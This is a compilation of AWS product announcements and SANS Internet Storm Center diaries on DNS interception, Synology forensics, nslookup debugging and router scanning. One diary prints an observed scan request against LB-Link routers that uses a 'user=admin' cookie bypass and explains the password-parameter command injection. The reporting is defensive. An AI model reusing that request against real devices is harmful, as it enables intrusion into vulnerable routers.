A new generative engine and three voices are now generally available on Amazon Polly

This post was originally published on this site

Today, we are announcing the general availability of the generative engine of Amazon Polly with three voices: Ruth and Matthew in American English and Amy in British English. The new generative engine was trained with publicly available and proprietary data, a variety of voices, languages, and styles. It performs with the highest precision to render context-dependent prosody, pausing, spelling, dialectal properties, foreign word pronunciation, and more.

Amazon Polly is a machine learning (ML) service that converts text to lifelike speech, called text-to-speech (TTS) technology. Now, Amazon Polly includes high-quality, natural-sounding human-like voices in dozens of languages, so you can select the ideal voice and distribute your speech-enabled applications in many locales or countries.

With Amazon Polly, you can select various voice options, including neural, long-form, and generative voices, which deliver ground-breaking improvements in speech quality and produce human-like, highly expressive, and emotionally adept voices. You can store speech output in standard formats like MP3 or OGG, adjust the speech rate, pitch, or volume with Speech Synthesis Markup Language (SSML) tags, and quickly deliver lifelike voices and conversational user experiences with consistently fast response times.

What’s the new generative engine?
Amazon Polly now supports four voice engines: standard, neural, long-form, and generative voices.

Standard TTS voices, introduced in 2016 use traditional concatenative synthesis. This method strings together the phonemes of recorded speech, producing very natural-sounding synthesized speech. However, the inevitable variations in speech and the techniques used to segment the waveforms limit the quality of speech.

Neural TTS (NTTS) voices, introduced in 2019, use a sequence-to-sequence neural network that converts a sequence of phonemes into spectrograms, and a neural vocoder that converts the spectrograms into a continuous audio signal. The NTTS produces even higher quality human-like voices than its standard voices.

Long-form voices, introduced in 2023, are developed with cutting-edge deep learning TTS technology and designed to captivate listeners’ attention for longer content, such as news articles, training materials, or marketing videos.

In February 2024, Amazon scientists introduced a new research TTS model called Big Adaptive Streamable TTS with Emergent abilities (BASE). With this technology, Polly Generative engine is able to create human-like synthetically generated voices. You can use these voices as a knowledgeable customer assistant, a virtual trainer, or an experienced marketer.

Here are the new generative voices:

Name Locale Gender Language Sample prompt NTTS voices
Generative voices
Ruth en_US Female English (US) Selma was lying on the ground halfway down the steps. 'Selma! Selma!' we shouted in panic.
Matthew en_US Male English (US) The guards were standing outside with some of our neighbours, listening to a transistor radio. 'Any good news?' I asked. 'No, we're listening to the names of people who were killed yesterday,' Bruno replied.
Amy en_GB Female English (British) What are you looking at?' he said as he stood over me. They got off the bus and started searching the baggage compartment. The tension on the bus was like a dark, menacing cloud that hovered above us.

You can choose from these voice options to suit your application and use case. To learn more about the generative engine, visit Generative voices in the AWS documentation.

Get started with using generative voices
You can access the new voices using the AWS Management Console, AWS Command Line Interface (AWS CLI), or the AWS SDKs.

To get started, go to the Amazon Polly console in the US (N. Virginia) Region and choose Text-to-Speech menu in the left pane. If you select the voice of Ruth or Matthew in the language of English, US or Amy in English, UK, you can choose Generative engine. Input your text and listen to or download the generated voice output.

Using the CLI, you can list the voices that use the new generative engine:

$ aws polly describe-voices --output json --region us-east-1 
| jq -r '.Voices[] | select(.SupportedEngines | index("generative")) | .Name'

Matthew
Amy
Ruth

Now, run the synthesize-speech CLI command to synthesize sample text to an audio file (hello.mp3) with the parameters of generative engine and a supported voice ID.

$ aws polly synthesize-speech --output-format mp3 --region us-east-1 
  --text "Hello. This is my first generative voices!" 
  --voice-id Matthew --engine generative hello.mp3

To learn more code examples using AWS SDKs, visit Code and Application Examples in the AWS documentation. You can use Java and Python code examples, application examples such as web applications using Java or Python, or iOS and Android applications.

Now available
The new generative voices of Amazon Polly are now available today in the US East (N. Virginia) Region. You only pay for what you use based on the number of characters of text that you convert to speech. To learn more, visit our Amazon Polly Pricing page.

Give new generative voices a try in the Amazon Polly console today and send feedback to AWS re:Post for Amazon Polly or through your usual AWS Support contacts.

Channy

Analyzing Synology Disks on Linux, (Wed, May 8th)

This post was originally published on this site

Synology NAS solutions are popular devices. They are also used in many organizations. Their product range goes from small boxes with two disks (I’m not sure they still sell a single-disk enclosure today) up to monsters, rackable with plenty of disks. They offer multiple disk management options but rely on many open-source software (like most appliances). For example, there are no expensive hardware RAID controllers in the box. They use the good old “MD” (“multiple devices”) technology, managed with the well-known mdadm tool[1]. Synology NAS run a Linux distribution called DSM. This operating system has plenty of third-party tools but lacks pure forensics tools.

In a recent investigation, I had to investigate a NAS that was involved in a ransomware attack. Many files (backups) were deleted. The attacker just deleted some shared folders. The device had two drives configured in RAID0 (not the best solution I know but they lack storage capacity). The idea was to mount the file system (or at least have the block device) on a Linux host and run forensic tools, for example, photorec.

In such a situation, the biggest challenge will be to connect all the drivers to the analysis host! Here, I had only two drives but imagine that you are facing a bigger model with 5+ disks. In my case, I used two USB-C/SATA adapters to connect the drives. Besides the software RAID, Synology volumes also rely on LVM2 (“Logical Volume Manager”)[2]. In most distributions, the packages mdadm and lvm2 are available (for example on SIFT Workstation). Otherwise, just install them:

# apt install mdadm lvm2

Once you connect the disks (tip: add a label on them to replace them in the right order) to the analysis host, verify if they are properly detected:

# lsblk
NAME    MAJ:MIN RM   SIZE RO TYPE  MOUNTPOINTS
sda       8:0    0 465.8G  0 disk
|-sda1    8:1    0 464.8G  0 part  /
|-sda2    8:2    0     1K  0 part
`-sda5    8:5    0   975M  0 part  [SWAP]
sdb       8:16   0   3.6T  0 disk
|-sdb1    8:17   0     8G  0 part
|-sdb2    8:18   0     2G  0 part
`-sdb3    8:19   0   3.6T  0 part
sdc       8:32   0   3.6T  0 disk
|-sdc1    8:33   0   2.4G  0 part
|-sdc2    8:34   0     2G  0 part
`-sdc3    8:35   0   3.6T  0 part
sr0      11:0    1  1024M  0 rom

"sdb3" and "sdc3" are the NAS partitions used to store data (2 x 4TB in RAID0). The good news, the kernel will detect that these disks are part of a software RAID! You just need to rescan them and "re-assemble" the RAID:

# mdadm --assemble --readonly --scan --force --run 

Then, your data should be available via a /dev/md? device:

# cat /proc/mdstat
Personalities : [raid0]
md0 : active (read-only) raid0 sdb3[0] sdc3[1]
      7792588416 blocks super 1.2 64k chunks

unused devices: <none>

The next step is to detect how data are managed by the NAS. Synology provides a technology called SHR[3] that uses LVM:

# lvdisplay
  WARNING: PV /dev/md0 in VG vg1 is using an old PV header, modify the VG to update.
  --- Logical volume ---
  LV Path                /dev/vg1/syno_vg_reserved_area
  LV Name                syno_vg_reserved_area
  VG Name                vg1
  LV UUID                08g9nN-Etde-JFN9-tn3D-JPHS-pyoC-LkVZAI
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                12.00 MiB
  Current LE             3
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

  --- Logical volume ---
  LV Path                /dev/vg1/volume_1
  LV Name                volume_1
  VG Name                vg1
  LV UUID                fgjC0Y-mvx5-J5Qd-Us2k-Ppaz-KG5X-tgLxaX
  LV Write Access        read/write
  LV Creation host, time ,
  LV Status              NOT available
  LV Size                <7.26 TiB
  Current LE             1902336
  Segments               1
  Allocation             inherit
  Read ahead sectors     auto

You can see that the NAS has only one volume created ("volume_1" is the default name in DSM).

From now on, you can use /dev/vg1/volume_1 in your investigations. Mount it, scan it, image it, etc…

[1] https://en.wikipedia.org/wiki/Mdadm
[2] https://en.wikipedia.org/wiki/Logical_Volume_Manager_(Linux)
[3] https://kb.synology.com/en-br/DSM/tutorial/What_is_Synology_Hybrid_RAID_SHR

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Detecting XFinity/Comcast DNS Spoofing, (Mon, May 6th)

This post was originally published on this site

ISPs have a history of intercepting DNS. Often, DNS interception is done as part of a "value add" feature to block access to known malicious websites. Sometimes, users are directed to advertisements if they attempt to access a site that doesn't exist. There are two common techniques how DNS spoofing/interception is done:

  1. The ISP provides a recommended DNS server. This DNS server will filter requests to known malicious sites.
  2. The ISP intercepts all DNS requests, not just requests directed at the ISPs DNS server.

The first method is what I would consider a "recommended" or "best practice" method. The customer can use the ISP's DNS server, but traffic is left untouched if a customer selects a different recursive resolver. The problem with this approach is that malware sometimes alters the user's DNS settings.

Comcast, as part of its "Business Class" offer, provides a tool called "Security Edge". It is typically included for free as part of the service. Security Edge is supposed to interface with the customer's modem but can only do so for specific configurations. Part of the service is provided by DNS interception. Even if "Security Edge" is disabled in the customer's dashboard, DNS interception may still be active.

One issue with any filtering based on blocklists is false positives. In some cases, what constitutes a "malicious" hostname may not even be well defined. I could not find a definition on Comcast's website. But Bleeping Computer (www.bleepingcomputer.com) recently ended up on Comcast's "naughty list". I know all to well that it is easy for a website that covers security topics to end up on these lists. The Internet Storm Center website has been on lists like this before. Usually, sloppy signature-based checks will flag a site as malicious. An article may discuss a specific attack and quote strings triggering these signatures.

Comcast offers recursive resolvers to it's customers: 75.75.75.75, 75.75.76.76, 2001:558:feed:1 and 2001:558:feed:2. There are advantages to using your ISP's DNS servers. They are often faster as they are physically closer to your network, and you profit from responses cached by other users. My internal resolver is configured as a forwarding resolver, spreading queries among different well performing resolvers like Quad9, Cloudflare and Google.

So what happened to bleepingcomputer.com? When I wasn't able to resolve bleepingcomputer.com, I checked my DNS logs, and this entry stuck out:

broken trust chain resolving 'bleepingcomputer.com/A/IN': 8.8.8.8#53 

My resolver verifies DNSSEC. Suddenly, I could not verify DNSSEC, which is a good indication that either DNSSEC was misconfigured or someone was modifying DNS responses. Note that the response appeared to come from Google's name server (8.8.8.8).

My first step in debugging this problem was dnsviz.net, a website operated by Sandia National Laboratory. The site does a good job of visualizing DNSSEC and identifying configuration issues. Bleepingcomputer.com looked fine. Bleepingcomputer didn't use DNSSEC. So why the error? There was another error in my resolver's logs that shed some light on the issue:

no valid RRSIG resolving 'bleepingcomputer.com/DS/IN': 8.8.8.8#53

DNSSEC has to establish somehow if a particular site supports DNSSEC or not. The parent zone should offer an "NSEC3" record to identify zones that are not signed or not signed. DS records, also offered by the parent zone, verify the keys you may receive for a zone. If DNS is intercepted, the requests for these records may fail, indicating that something odd is happening.

So, someone was "playing" with DNS. And it affected various DNS servers I tried, not just Comcast or Google. Using "dig" to query the name servers directly, and skipping DNSSEC, I received a response:

8.8.8.8.53 > 10.64.10.10.4376: 35148 2/0/1 www.bleepingcomputer.com. A 192.73.243.24, www.bleepingcomputer.com. A 192.73.243.36 (85)

Usually, www.bleepingcomputer.com resolved to:

% dig +short www.bleepingcomputer.com
104.20.185.56
172.67.2.229
104.20.184.56

It took a bit of convincing, but I was able to pull up the web page at the wrong IP address:

screen shot of Comcast block page.

The problem with these warning pages is that you usually never see them. Even if you resolve the IP address, TLS will break the connection, and many sites employ strict transport security. As part of my Comcast business account, I can "brand" the page, but by default, it is hard to tell that this page was delivered by Comcast.

But how do we know if someone is interfering with DNS traffic? A simple check I am employing is to look for the DNS timing and compare the TTL values for different name servers.

(1) Check timing

Send the same query to multiple public recursive DNS servers. For example:

% dig www.bleepingcomputer.com @75.75.75.75

; <<>> DiG 9.10.6 <<>> www.bleepingcomputer.com @75.75.75.75
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8432
;; flags: qr rd ra; QUERY: 1, ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;www.bleepingcomputer.com.    IN    A

;; ANSWER SECTION:
www.bleepingcomputer.com. 89    IN    A    104.20.185.56
www.bleepingcomputer.com. 89    IN    A    104.20.184.56
www.bleepingcomputer.com. 89    IN    A    172.67.2.229

;; Query time: 59 msec
;; SERVER: 75.75.75.75#53(75.75.75.75)
;; WHEN: Tue May 07 20:00:05 EDT 2024
;; MSG SIZE  rcvd: 101

Dig includes the "Query time" in its output. In this case, it was 59 msec. We expect a speedy time like this for Comcast's DNS server while connected to Comcast's network. But let's compare this to other servers:

8.8.8.8: 59 msec
1.1.1.1: 59 msec
9.9.9.9: 64 msec
11.11.11.11: 68 msec
113.113.113.113: 69 msec

The results are very consistent. In particular, the last one is interesting. This server is located in China. 

(2) check TTLs

A recursive resolver will add a response it receives from an authoritative DNS server to its cache. The TTL for records bulled from the cache will decrease with the time the response sits in the resolver's cache. If all responses come from the same resolver, the TTL should decrement consistently. This test is a bit less telling. Often, several servers are used, and with anycast, it is not always easy to tell which server the response comes from. These servers do not always have a consistent cache.

Final Words

DNS interception, even if well-meaning, does undermine some of the basic "internet trust issues". Even if it is used to block users from malicious sites, it needs to be properly declared to the user, and switches to turn it off will have to function. This could be a particular problem if queries to other DNS filtering services are intercepted. I have yet to test this for Comcast and, for example, OpenDNS.

 

 

 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

AWS Weekly Roundup: Amazon Q, Amazon QuickSight, AWS CodeArtifact, Amazon Bedrock, and more (May 6, 2024)

This post was originally published on this site

April has been packed with new releases! Last week continued that trend with many new releases supporting a variety of domains such as security, analytics, devops, and many more, as well as more exciting new capabilities within generative AI.

If you missed the AWS Summit London 2024, you can now watch the sessions on demand, including the keynote by Tanuja Randery, VP & Marketing Director, EMEA, and many of the break-out sessions which will continue to be released over the coming weeks.

Last week’s launches
Here are some of the highlights that caught my attention this week:

Manual and automatic rollback from any stage in AWS CodePipeline – You can now rollback any stage, other than Source, to any previously known good state in if you use a V2 pipeline in AWS CodePipeline. You can configure automatic rollback which will use the source changes from the most recent successful pipeline execution in the case of failure, or you can initiate a manual rollback for any stage from the console, API or SDK and choose which pipeline execution you want to use for the rollback.

AWS CodeArtifact now supports RubyGems – Ruby community, rejoice, you can now store your gems in AWS CodeArtifact! You can integrate it with RubyGems.org, and CodeArtifact will automatically fetch any gems requested by the client and store them locally in your CodeArtifact repository. That means that you can have a centralized place for both your first-party and public gems so developers can access their dependencies from a single source.

Ruby-repo screenshot

Create a repository in AWS CodeArtifact and choose “rubygems-store” to connect your repository to RubyGems.org on the “Public upstream repositories” dropdown.

Amazon EventBridge Pipes now supports event delivery through AWS PrivateLink – You can now deliver events to an Amazon EventBridge Pipes target without traversing the public internet by using AWS PrivateLink. You can poll for events in a private subnet in your Amazon Virtual Private Cloud (VPC) without having to deploy any additional infrastructure to keep your traffic private.

Amazon Bedrock launches continue. You can now run scalable, enterprise-grade generative AI workloads with Cohere Command R & R+. And Amazon Titan Text V2 is now optimized for improving Retrieval-Augmented Generation (RAG).

AWS Trusted Advisor – last year we launched Trusted Advisor APIs enabling you to programmatically consume recommendations. A new API is available now that you can use to exclude resources from recommendations.

Amazon EC2 – there have been two new great launches this week for EC2 users. You can now mark your AMIs as “protected” to avoid them being deregistered by accident. You can also now easily discover your active AMIs by simply describing them.

Amazon CodeCatalyst – you can now view your git commit history in the CodeCatalyst console.

General Availability
Many new services and capabilities became generally available this week.

Amazon Q in QuickSight – Amazon Q has brought generative BI to Amazon QuickSight giving you the ability to build beautiful dashboards automatically simply by using natural language and it’s now generally available. To get started, head to the Quicksight Pricing page to explore all options or start a 30-day free trial which allows up to 4 users per QuickSight account to use all the new generative AI features.

With the new generative AI features enabled by Amazon Q in Amazon QuickSight you can use natural language queries to build, sort and filter dashboards. (source: AWS Documentation)

Amazon Q Business (GA) and Amazon Q Apps (Preview) – Also generally available now is Amazon Q Business which we launched last year at AWS re:Invent 2023 with the ability to connect seamlessly with over 40 popular enterprise systems, including Microsoft 365, Salesforce, Amazon Simple Storage Service (Amazon S3), Gmail, and so many more. This allows Amazon Q Business to know about your business so your employees can generate content, solve problems, and take actions that are specific to your business.

We have also launched support for custom plug-ins, so now you can create your own integrations with any third-party application.

Q-business screenshot

With general availability of Amazon Q Business we have also launched the ability to create your own custom plugins to connect to any third-party API.

Another highlight of this release is the launch of Amazon Q Apps, which enables you to quickly generate an app from your conversation with Amazon Q Business, or by describing what you would like it to generate for you. All guardrails from Amazon Q Business apply, and it’s easy to share your apps with colleagues through an admin-managed library. Amazon Q Apps is in preview now.

Check out Channy Yun’s post for a deeper dive into Amazon Q Business and Amazon Q Apps, which guides you through these new features.

Amazon Q Developer – you can use Q Developer to completely change your developer flow. It has all the capabilities of what was previously known as Amazon CodeWhisperer, such as Q&A, diagnosing common errors, generating code including tests, and many more. Now it has expanded, so you can use it to generate SQL, and build data integration pipelines using natural language. In preview, it can describe resources in your AWS account and help you retrieve and analyze cost data from AWS Cost Explorer.

For a full list of AWS announcements, be sure to keep an eye on the ‘What’s New with AWS?‘ page.

Other AWS news
Here are some additional projects, blog posts, and news items that you might find interesting:

AWS open source news and updates – My colleague Ricardo writes about open source projects, tools, and events from the AWS Community.

Discover Claude 3 – If you’re a developer looking for a good source to get started with Claude 3 them I recommend this great post from my colleague Haowen Huang: Mastering Amazon Bedrock with Claude 3: Developer’s Guide with Demos.

Upcoming AWS events
Check your calendars and sign up for upcoming AWS events:

AWS Summits – Join free online and in-person events that bring the cloud computing community together to connect, collaborate, and learn about AWS. Register in your nearest city: Singapore (May 7), Seoul (May 16–17), Hong Kong (May 22), Milan (May 23), Stockholm (June 4), and Madrid (June 5).

AWS re:Inforce – Explore 2.5 days of immersive cloud security learning in the age of generative AI at AWS re:Inforce, June 10–12 in Pennsylvania.

AWS Community Days – Join community-led conferences that feature technical discussions, workshops, and hands-on labs led by expert AWS users and industry leaders from around the world: Turkey (May 18), Midwest | Columbus (June 13), Sri Lanka (June 27), Cameroon (July 13), Nigeria (August 24), and New York (August 28).

GOTO EDA Day LondonJoin us in London on May 14 to learn about event-driven architectures (EDA) for building highly scalable, fault tolerant, and extensible applications. This conference is organized by GOTO, AWS, and partners.

Browse all upcoming AWS led in-person and virtual events and developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Matheus Guimaraes

This post is part of our Weekly Roundup series. Check back each week for a quick roundup of interesting news and announcements from AWS!

nslookup's Debug Options, (Sun, May 5th)

This post was originally published on this site

A friend was having unexpected results with DNS queries on a Windows machine. I told him to use nslookup's debug options.

When you execute a simple DNS query like "nslookup example.com. 8.8.8.8", you get an answer like this (notice that in my nslookup query, I terminated the FQDN with a dot: "example.com.", I do that to prevent Windows from adding suffixes):

You see the result of a reverse DNS lookup (8.8.8.8 is dns.google) and you get 2 IP addresses for example.com in your answer: an IPv6 address and an IPv4 address.

If my friend would have been able to run packet capture on the machine, he would have seen 3 DNS queries and answers:

A PTR query to do a reverse DNS lookup for 8.8.8.8, an A query to lookup IPv4 addresses for example.com, and an AAAA query to lookup IPv6 addresses for example.com.

One can use nslookup's debug options to obtain equivalent information, without doing a packet capture.

Debug option -d displays extra information for each DNS response packet:

Here is nslookup's parsed DNS response packet for the PTR query:

Here is Wireshark's dissection of this packet:

You can see that the debug output contains the same packet information as Wireshark's, but presented in another form.

The same applies for the A query:

And the AAAA query:

If you also want to see the DNS query packets, you can use debug option -d2:

Besides the parsed DNS query, you now also see the length in bytes of each DNS packet (the UDP payload).

Here is the A query:

And here is the AAAA query:

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Scans Probing for LB-Link and Vinga WR-AC1200 routers CVE-2023-24796, (Thu, May 2nd)

This post was originally published on this site

Before diving into the vulnerability, a bit about the affected devices. LB-Link, the make of the devices affected by this vulnerability, produces various wireless equipment that is sometimes sold under different brands and labels. This will make it difficult to identify affected devices. These devices are often low-cost "no name" solutions or, in some cases, may even be embedded, which makes it even more difficult to find firmware updates.

Before buying any IoT device, WiFi router, or similar piece of equipment, please make sure the vendor does:

  1. Offer firmware updates for download from an easy-to-find location.
  2. Provide an "end of life" policy stating how long a particular device will receive updates.

Alternatively, you may want to verify if the device can be "re-flashed" using an open source firmware.

But let us go back to this vulnerability. There are two URLs affected, one of which showed up in our "First Seen URLs":

/goform/sysTools
/goform/set_LimitClient_cfg

The second one has been used more in the past, the first is relatively new in our logs. The graph below shows how "set_LimitClient.cfg" is much more popular. We only saw a significant number of scans for "sysTools" on May 1st.

The full requests we are seeing:

POST /goform/set_LimitClient_cfg HTTP/1.1
Cookie: user=admin

And yes, the vulnerability evolves around the "user=admin" cookie and a command injection in the password parameter. This is too stupid to waste any more time on, but it is common enough to just give up and call it a day. The NVD entry for the vulnerability was updated last week, adding an older PoC exploit to it. Maybe that got some kids interested in this vulnerability again.


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Stop the CNAME chain struggle: Simplified management with Route 53 Resolver DNS Firewall

This post was originally published on this site

Starting today, you can configure your DNS Firewall to automatically trust all domains in a resolution chain (such as aCNAME, DNAME, or Alias chain).

Let’s walk through this in nontechnical terms for those unfamiliar with DNS.

Why use DNS Firewall?
DNS Firewall provides protection for outbound DNS requests from your private network in the cloud (Amazon Virtual Private Cloud (Amazon VPC)). These requests route through Amazon Route 53 Resolver for domain name resolution. Firewall administrators can configure rules to filter and regulate the outbound DNS traffic.

DNS Firewall helps to protect against multiple security risks.

Let’s imagine a malicious actor managed to install and run some code on your Amazon Elastic Compute Cloud (Amazon EC2) instances or containers running inside one of your virtual private clouds (VPCs). The malicious code is likely to initiate outgoing network connections. It might do so to connect to a command server and receive commands to execute on your machine. Or it might initiate connections to a third-party service in a coordinated distributed denial of service (DDoS) attack. It might also try to exfiltrate data it managed to collect on your network.

Fortunately, your network and security groups are correctly configured. They block all outgoing traffic except the one to well-known API endpoints used by your app. So far so good—the malicious code cannot dial back home using regular TCP or UDP connections.

But what about DNS traffic? The malicious code may send DNS requests to an authoritative DNS server they control to either send control commands or encoded data, and it can receive data back in the response. I’ve illustrated the process in the following diagram.

DNS exfiltration illustrated

To prevent these scenarios, you can use a DNS Firewall to monitor and control the domains that your applications can query. You can deny access to the domains that you know to be bad and allow all other queries to pass through. Alternately, you can deny access to all domains except those you explicitly trust.

What is the challenge with CNAME, DNAME, and Alias records?
Imagine you configured your DNS Firewall to allow DNS queries only to specific well-known domains and blocked all others. Your application communicates with alexa.amazon.com; therefore, you created a rule allowing DNS traffic to resolve that hostname.

However, the DNS system has multiple types of records. The ones of interest in this article are

  • A records that map a DNS name to an IP address,
  • CNAME records that are synonyms for other DNS names,
  • DNAME records that provide redirection from a part of the DNS name tree to another part of the DNS name tree, and
  • Alias records that provide a Route 53 specific extension to DNS functionality. Alias records let you route traffic to selected AWS resources, such as Amazon CloudFront distributions and Amazon S3 buckets

When querying alexa.amazon.com, I see it’s actually a CNAME record that points to pitangui.amazon.com, which is another CNAME record that points to tp.5fd53c725-frontier.amazon.com, which, in turn, is a CNAME to d1wg1w6p5q8555.cloudfront.net. Only the last name (d1wg1w6p5q8555.cloudfront.net) has an A record associated with an IP address 3.162.42.28. The IP address is likely to be different for you. It points to the closest Amazon CloudFront edge location, likely the one from Paris (CDG52) for me.

A similar redirection mechanism happens when resolving DNAME or Alias records.

DNS resolution for alexa.amazon.com

To allow the complete resolution of such a CNAME chain, you could be tempted to configure your DNS Firewall rule to allow all names under amazon.com (*.amazon.com), but that would fail to resolve the last CNAME that goes to cloudfront.net.

Worst, the DNS CNAME chain is controlled by the service your application connects to. The chain might change at any time, forcing you to manually maintain the list of rules and authorized domains inside your DNS Firewall rules.

Introducing DNS Firewall redirection chain authorization
Based on this explanation, you’re now equipped to understand the new capability we launch today. We added a parameter to the UpdateFirewallRule API (also available on the AWS Command Line Interface (AWS CLI) and AWS Management Console) to configure the DNS Firewall so that it follows and automatically trusts all the domains in a CNAME, DNAME, or Alias chain.

This parameter allows firewall administrators to only allow the domain your applications query. The firewall will automatically trust all intermediate domains in the chain until it reaches the A record with the IP address.

Let’s see it in action
I start with a DNS Firewall already configured with a domain list, a rule group, and a rule that ALLOW queries for the domain alexa.amazon.com. The rule group is attached to a VPC where I have an EC2 instance started.

When I connect to that EC2 instance and issue a DNS query to resolve alexa.amazon.com, it only returns the first name in the domain chain (pitangui.amazon.com) and stops there. This is expected because pitangui.amazon.com is not authorized to be resolved.

DNS query for alexa.amazon.com is blocked at first CNAME

To solve this, I update the firewall rule to trust the entire redirection chain. I use the AWS CLI to call the update-firewall-rule API with a new parameter firewall-domain-redirection-action set to TRUST_REDIRECTION_DOMAIN.

AWS CLI to update the DNS firewall rule

The following diagram illustrates the setup at this stage.

DNS Firewall rule diagram

Back to the EC2 instance, I try the DNS query again. This time, it works. It resolves the entire redirection chain, down to the IP address ????.

DNS resolution for the full CNAME chain

Thanks to the trusted chain redirection, network administrators now have an easy way to implement a strategy to block all domains and authorize only known domains in their DNS Firewall without having to care about CNAME, DNAME, or Alias chains.

This capability is available at no additional cost in all AWS Regions. Try it out today!

— seb

Linux Trojan – Xorddos with Filename eyshcjdmzg, (Mon, Apr 29th)

This post was originally published on this site

I reviewed a filename I see regularly uploaded to my DShield sensor eyshcjdmzg that have been seeing since the 1 October 2023 which has multiple hashes and has been labeled as trojan.xorddos/ddos. These various files have only been uploaded to my DShield sensor by IP 218.92.0.60. Here is the timeline of the activity since 1 October 2023.

Add your Ruby gems to AWS CodeArtifact

This post was originally published on this site

Ruby developers can now use AWS CodeArtifact to securely store and retrieve their gems. CodeArtifact integrates with standard developer tools like gem and bundler.

Applications often use numerous packages to speed up development by providing reusable code for common tasks like network access, cryptography, or data manipulation. Developers also embed SDKs–such as the AWS SDKs–to access remote services. These packages may come from within your organization or from third parties like open source projects. Managing packages and dependencies is integral to software development. Languages like Java, C#, JavaScript, Swift, and Python have tools for downloading and resolving dependencies, and Ruby developers typically use gem and bundler.

However, using third-party packages presents legal and security challenges. Organizations must ensure package licenses are compatible with their projects and don’t violate intellectual property. They must also verify that the included code is safe and doesn’t introduce vulnerabilities, a tactic known as a supply chain attack. To address these challenges, organizations typically use private package servers. Developers can only use packages vetted by security and legal teams made available through private repositories.

CodeArtifact is a managed service that allows the safe distribution of packages to internal developer teams without managing the underlying infrastructure. CodeArtifact now supports Ruby gems in addition to npm, PyPI, Maven, NuGet, SwiftPM, and generic formats.

You can publish and download Ruby gem dependencies from your CodeArtifact repository in the AWS Cloud, working with existing tools such as gem and bundler. After storing packages in CodeArtifact, you can reference them in your Gemfile. Your build system will then download approved packages from the CodeArtifact repository during the build process.

How to get started
Imagine I’m working on a package to be shared with other development teams in my organization.

In this demo, I show you how I prepare my environment, upload the package to the repository, and use this specific package build as a dependency for my project. I focus on the steps specific to Ruby packages. You can read the tutorial written by my colleague Steven to get started with CodeArtifact.

I use an AWS account that has a package repository (MyGemsRepo) and domain (stormacq-test) already configured.

CodeArtifact - Ruby repository

To let the Ruby tools acess my CodeArtifact repository, I start by collecting an authentication token from CodeArtifact.

export CODEARTIFACT_AUTH_TOKEN=`aws codeartifact get-authorization-token 
                                     --domain stormacq-test              
                                     --domain-owner 012345678912         
                                     --query authorizationToken          
                                     --output text`

export GEM_HOST_API_KEY="Bearer $CODEARTIFACT_AUTH_TOKEN"

Note that the authentication token expires after 12 hours. I must repeat this command after 12 hours to obtain a fresh token.

Then, I request the repository endpoint. I pass the domain name and domain owner (the AWS account ID). Notice the --format ruby option.

export RUBYGEMS_HOST=`aws codeartifact get-repository-endpoint  
                           --domain stormacq-test               
                           --domain-owner 012345678912          
                           --format ruby                        
                           --repository MyGemsRepo              
                           --query repositoryEndpoint           
                           --output text`

Now that I have the repository endpoint and an authentication token, gem will use these environment variable values to connect to my private package repository.

I create a very simple project, build it, and send it to the package repository.

CodeArtifact - building and pushing a custom package

$ gem build hola.gemspec 

Successfully built RubyGem
  Name: hola-codeartifact
  Version: 0.0.0
  File: hola-codeartifact-0.0.0.gem
  
$ gem push hola-codeartifact-0.0.0.gem 
Pushing gem to https://stormacq-test-486652066693.d.codeartifact.us-west-2.amazonaws.com/ruby/MyGemsRepo...

I verify in the console that the package is available.

CodeArtifact - Hola package is present

Now that the package is available, I can use it in my projects as usual. This involves configuring the local ~/.gemrc file on my machine. I follow the instructions provided by the console, and I make sure I replace ${CODEARTIFACT_AUTH_TOKEN} with its actual value.

CodeArtifact - console instructions to connect to the repo

Once ~/.gemrc is correctly configured, I can install gems as usual. They will be downloaded from my private gem repository.

$ gem install hola-codeartifact

Fetching hola-codeartifact-0.0.0.gem
Successfully installed hola-codeartifact-0.0.0
Parsing documentation for hola-codeartifact-0.0.0
Installing ri documentation for hola-codeartifact-0.0.0
Done installing documentation for hola-codeartifact after 0 seconds
1 gem installed

Install from upstream
I can also associate my repository with an upstream source. It will automatically fetch gems from upstream when I request one.

To associate the repository with rubygems.org, I use the console, or I type

aws codeartifact  associate-external-connection 
                   --domain stormacq-test       
                   --repository MyGemsRepo      
                   --external-connection public:ruby-gems-org

{
    "repository": {
        "name": "MyGemsRepo",
        "administratorAccount": "012345678912",
        "domainName": "stormacq-test",
        "domainOwner": "012345678912",
        "arn": "arn:aws:codeartifact:us-west-2:012345678912:repository/stormacq-test/MyGemsRepo",
        "upstreams": [],
        "externalConnections": [
            {
                "externalConnectionName": "public:ruby-gems-org",
                "packageFormat": "ruby",
                "status": "AVAILABLE"
            }
        ],
        "createdTime": "2024-04-12T12:58:44.101000+02:00"
    }
}

Once associated, I can pull any gems through CodeArtifact. It will automatically fetch packages from upstream when not locally available.

$ gem install rake 

Fetching rake-13.2.1.gem
Successfully installed rake-13.2.1
Parsing documentation for rake-13.2.1
Installing ri documentation for rake-13.2.1
Done installing documentation for rake after 0 seconds
1 gem installed

I use the console to verify the rake package is now available in my repo.

Things to know
There are some things to keep in mind before uploading your first Ruby packages.

Pricing and availability
CodeArtifact costs for Ruby packages are the same as for the other package formats already supported. CodeArtifact billing depends on three metrics: the storage (measured in GB per month), the number of requests, and the data transfer out to the internet or to other AWS Regions. Data transfer to AWS services in the same Region is not charged, meaning you can run your continuous integration and delivery (CI/CD) jobs on Amazon Elastic Compute Cloud (Amazon EC2) or AWS CodeBuild, for example, without incurring a charge for the CodeArtifact data transfer. As usual, the pricing page has the details.

